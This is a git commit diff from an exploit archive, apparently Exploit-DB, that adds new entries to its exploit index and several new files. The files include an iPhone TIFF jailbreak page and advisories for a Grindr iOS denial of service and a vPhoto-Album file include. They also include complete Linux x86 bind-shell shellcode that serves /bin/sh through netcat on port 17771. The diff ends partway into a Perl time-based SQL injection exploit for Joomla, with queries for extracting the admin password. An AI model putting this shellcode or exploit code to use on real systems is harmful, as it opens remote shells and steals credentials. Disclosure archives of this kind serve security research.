DB: 2015-05-07
9 new exploits
This commit is contained in:
parent
dc83e39d07
commit
b2d25f8fa5
12 changed files with 815 additions and 79 deletions
11
files.csv
11
files.csv
|
@ -4164,6 +4164,7 @@ id,file,description,date,author,platform,type,port
|
|||
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0
|
||||
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0
|
||||
4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0
|
||||
4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
|
||||
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0
|
||||
4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
|
||||
4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
|
||||
|
@ -33207,7 +33208,7 @@ id,file,description,date,author,platform,type,port
|
|||
36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
|
||||
36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
|
||||
36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
|
||||
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
|
||||
36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
|
||||
36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
|
||||
|
@ -33293,12 +33294,20 @@ id,file,description,date,author,platform,type,port
|
|||
36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0
|
||||
36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0
|
||||
36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 'src' Parameter SQL Injection Vulnerability",2012-03-07,"Rob Miller",php,webapps,0
|
||||
36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0
|
||||
36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0
|
||||
36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x 'select_users_template' Parameter Local File Include Vulnerability",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
|
||||
36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
|
||||
36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' SQL Injection Vulnerability",2012-03-05,"Colin Wong",php,webapps,0
|
||||
36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0
|
||||
36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0
|
||||
36920,platforms/windows/local/36920.py,"Mediacoder 0.8.34.5716 - Buffer Overflow SEH Exploit (.m3u)",2015-05-06,evil_comrade,windows,local,0
|
||||
36921,platforms/lin_x86/shellcode/36921.c,"Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 Bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0
|
||||
36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0
|
||||
36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0
|
||||
36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0
|
||||
36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
|
||||
|
|
Can't render this file because it is too large.
|
|
@ -1,31 +1,31 @@
|
|||
<!--
|
||||
The iPhone / iTouch tif exploit is now officially released!
|
||||
source: http://www.toc2rta.com/
|
||||
|
||||
So its offical we have released the tiff exploit code.
|
||||
You can navigate in safari to http://jailbreak.toc2rta.com
|
||||
on your Itouch or Iphone 1.1.1. It will crash your Safari
|
||||
but then you will be able to browse the file system with
|
||||
full read/write access. This is only for people who understand
|
||||
what they are doing. You will need IPHUC and some knowledge of
|
||||
how to put/get files.
|
||||
|
||||
TUTORIAL FOR WINDOWS http://www.ipodtouchfans.com/forums/showthread.php?t=1570
|
||||
|
||||
Check back later for a full breakdown of how the
|
||||
tiff works and what the future holds for Toc2rta and the
|
||||
Itouch & Iphone.
|
||||
|
||||
Exploit by Niacin and Dre.
|
||||
|
||||
A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
|
||||
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
|
||||
their work that helped make this happen. You can visit the dev team's
|
||||
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
|
||||
-->
|
||||
|
||||
<html>
|
||||
<img src="http://www.milw0rm.com/sploits/10112007-iphone.tif">
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2007-10-11]
|
||||
<!--
|
||||
The iPhone / iTouch tif exploit is now officially released!
|
||||
source: http://www.toc2rta.com/
|
||||
|
||||
So its offical we have released the tiff exploit code.
|
||||
You can navigate in safari to http://jailbreak.toc2rta.com
|
||||
on your Itouch or Iphone 1.1.1. It will crash your Safari
|
||||
but then you will be able to browse the file system with
|
||||
full read/write access. This is only for people who understand
|
||||
what they are doing. You will need IPHUC and some knowledge of
|
||||
how to put/get files.
|
||||
|
||||
TUTORIAL FOR WINDOWS http://www.ipodtouchfans.com/forums/showthread.php?t=1570
|
||||
|
||||
Check back later for a full breakdown of how the
|
||||
tiff works and what the future holds for Toc2rta and the
|
||||
Itouch & Iphone.
|
||||
|
||||
Exploit by Niacin and Dre.
|
||||
|
||||
A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
|
||||
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
|
||||
their work that helped make this happen. You can visit the dev team's
|
||||
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
|
||||
-->
|
||||
|
||||
<html>
|
||||
<img src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10112007-iphone.tif">
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2007-10-11]
|
||||
|
|
162
platforms/ios/dos/36903.txt
Executable file
162
platforms/ios/dos/36903.txt
Executable file
|
@ -0,0 +1,162 @@
|
|||
Document Title:
|
||||
===============
|
||||
Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1418
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-05-02
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1418
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.3
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there.
|
||||
With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app
|
||||
every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s
|
||||
location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is
|
||||
entirely your call.
|
||||
|
||||
(Copy of the Vendor Homepage: http://grindr.com/learn-more )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
|
||||
2015-01-22: Vendor Notification (Grinder - Bug Bounty Program)
|
||||
2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program)
|
||||
2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x)
|
||||
2015-05-04: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Grindr LLC
|
||||
Product: Grinder - iOS Mobile Web Application (API) 2.2.1
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application.
|
||||
|
||||
The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module.
|
||||
After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the
|
||||
contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app.
|
||||
The issue is local and remote exploitable.
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Edit Profile
|
||||
|
||||
Vulnerable Parameter(s): (Input)
|
||||
[+] Display Name
|
||||
|
||||
Affected Module(s):
|
||||
[+] Contact > Social Network > Copy Link
|
||||
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click).
|
||||
To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue.
|
||||
|
||||
Manual steps to reproduce ...
|
||||
1. Open the grindr mobile application
|
||||
2. Inject a script code tag as Display Name or use the terminated String with empty values
|
||||
3. Save and click in the profile the contact button (exp. facebook)
|
||||
4. Click to the send button ahead and push the Copy Link function
|
||||
5. The app service is getting terminated with an uncaught exception because of an internal parsing error
|
||||
|
||||
Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button.
|
||||
|
||||
PoC Video:
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself.
|
||||
The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register
|
||||
an account and to insert own scripts <html5> or null strings that corrupts the process of copy the link by an error. After the restriction has been
|
||||
set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that
|
||||
was only a solution to prevent.
|
||||
|
||||
To fix the bug ...
|
||||
Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error
|
||||
folder that has been synced. Get the error attach another debugger and so on ...
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
263
platforms/ios/webapps/36922.txt
Executable file
263
platforms/ios/webapps/36922.txt
Executable file
|
@ -0,0 +1,263 @@
|
|||
Document Title:
|
||||
===============
|
||||
vPhoto-Album v4.2 iOS - File Include Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1477
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-05-05
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1477
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.2
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos,
|
||||
while giving you an unprecedented user experience. No in-app purchase, no functional limitations.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-05-05: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Cheng Chen
|
||||
Product: vPhoto-Album - iOS Web Application (Wifi) 4.1
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application.
|
||||
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
|
||||
specific path commands to compromise the mobile web-application.
|
||||
|
||||
The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the
|
||||
wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname.
|
||||
|
||||
Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync.
|
||||
The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application.
|
||||
The request method to inject is a sync and the attack vector is located on the application-side of the affected service.
|
||||
|
||||
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
|
||||
Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
|
||||
of the local file include web vulnerability results in mobile application or connected device component compromise.
|
||||
|
||||
Vulnerable Method(s):
|
||||
[+] [Sync]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Albumname
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
|
||||
Affected Module(s):
|
||||
[+] File Dir Index
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: http://localhost:8080/
|
||||
|
||||
<script type="text/javascript">
|
||||
var albumArray = getAllAlbum();
|
||||
var numberOfAlbums = getNumberOfAlbums();
|
||||
|
||||
for (var i=0; i<numberOfAlbums; i=i+4)
|
||||
{
|
||||
document.write("<tr>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+0 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+0]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+0)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+1 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+1]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+1)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+2 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+2]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+2)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+3 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+3]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+3)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("</tr>");
|
||||
|
||||
|
||||
document.write("<tr>");
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+0 < numberOfAlbums)
|
||||
{
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+0].name+"("+albumArray[i+0].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"20\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+1 < numberOfAlbums)
|
||||
{
|
||||
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+1].name+"("+albumArray[i+1].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"20\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+2 < numberOfAlbums)
|
||||
{
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+2].name+"("+albumArray[i+2].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"20\" width=\"50\"></td>");
|
||||
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+3 < numberOfAlbums)
|
||||
{
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+3].name+"("+albumArray[i+3].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("</tr>");
|
||||
|
||||
|
||||
document.write("<tr>");
|
||||
|
||||
document.write("<td height=\"20\" colspan=\"7\">"); document.write("</td>");
|
||||
|
||||
document.write("</tr>");
|
||||
}
|
||||
|
||||
</script>
|
||||
<tr><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[FILE INCLUDE VULNERABILITY!]%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=B94CC6C9-FB2C-4BFD-8BA4-0925E51146A1&filter=1537%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font face="Courier New" size="2">"><C[FILE INCLUDE VULNERABILITY!]>(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr>
|
||||
</table>
|
||||
</div>
|
||||
</body>
|
||||
</html></iframe></font></p></td></tr></tbody>
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:8080/
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||
|
||||
|
||||
|
51
platforms/lin_x86/shellcode/36921.c
Executable file
51
platforms/lin_x86/shellcode/36921.c
Executable file
|
@ -0,0 +1,51 @@
|
|||
/*
|
||||
# Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode
|
||||
# This shellcode will listen on port 17771 and give you /bin/sh
|
||||
# Shellcode Author: Oleg Boytsev
|
||||
# Tested on: Debian GNU/Linux 7/i686
|
||||
# Shellcode Length: 58
|
||||
# Command: gcc -m32 -z execstack x86_Linux_netcat_shellcode.c -o x86_Linux_netcat_shellcode
|
||||
|
||||
global _start
|
||||
section .text
|
||||
_start:
|
||||
xor eax, eax
|
||||
xor edx, edx
|
||||
push eax
|
||||
push 0x31373737 ;-vp17771
|
||||
push 0x3170762d
|
||||
mov esi, esp
|
||||
|
||||
push eax
|
||||
push 0x68732f2f ;-le//bin//sh
|
||||
push 0x6e69622f
|
||||
push 0x2f656c2d
|
||||
mov edi, esp
|
||||
|
||||
push eax
|
||||
push 0x636e2f2f ;/bin//nc
|
||||
push 0x6e69622f
|
||||
mov ebx, esp
|
||||
|
||||
push edx
|
||||
push esi
|
||||
push edi
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
mov al,11
|
||||
int 0x80
|
||||
*/
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h>
|
||||
|
||||
unsigned char shellcode[] =
|
||||
"\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
|
||||
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n",strlen(shellcode));
|
||||
int (*ret)() = (int(*)())shellcode;
|
||||
ret();
|
||||
}
|
||||
|
125
platforms/php/webapps/36913.pl
Executable file
125
platforms/php/webapps/36913.pl
Executable file
|
@ -0,0 +1,125 @@
|
|||
source: http://www.securityfocus.com/bid/52312/info
|
||||
|
||||
Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||
|
||||
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||
|
||||
#!/usr/bin/perl
|
||||
# Thu Mar 15 22:55:32 CET 2012 A. Ramos <aramosf()unsec.net>
|
||||
# www.securitybydefault.com
|
||||
# Joomla <2.5.1 time based sql injection - vuln by Colin Wong
|
||||
#
|
||||
# using sleep() and not benchmark(), change for < mysql 5.0.12
|
||||
#
|
||||
# 1.- Database name: database()
|
||||
# 2.- Users data table name: (change 'joomla' for database() result)
|
||||
# select table_name from information_schema.tables where table_schema = "joomla" and table_name like "%_users"
|
||||
# 3.- Admin password: (change zzz_users from previus sql query result)
|
||||
# select password from zzzz_users limit 1
|
||||
|
||||
|
||||
|
||||
use strict;
|
||||
use LWP::UserAgent;
|
||||
$| = 1;
|
||||
|
||||
|
||||
my $url = $ARGV[0];
|
||||
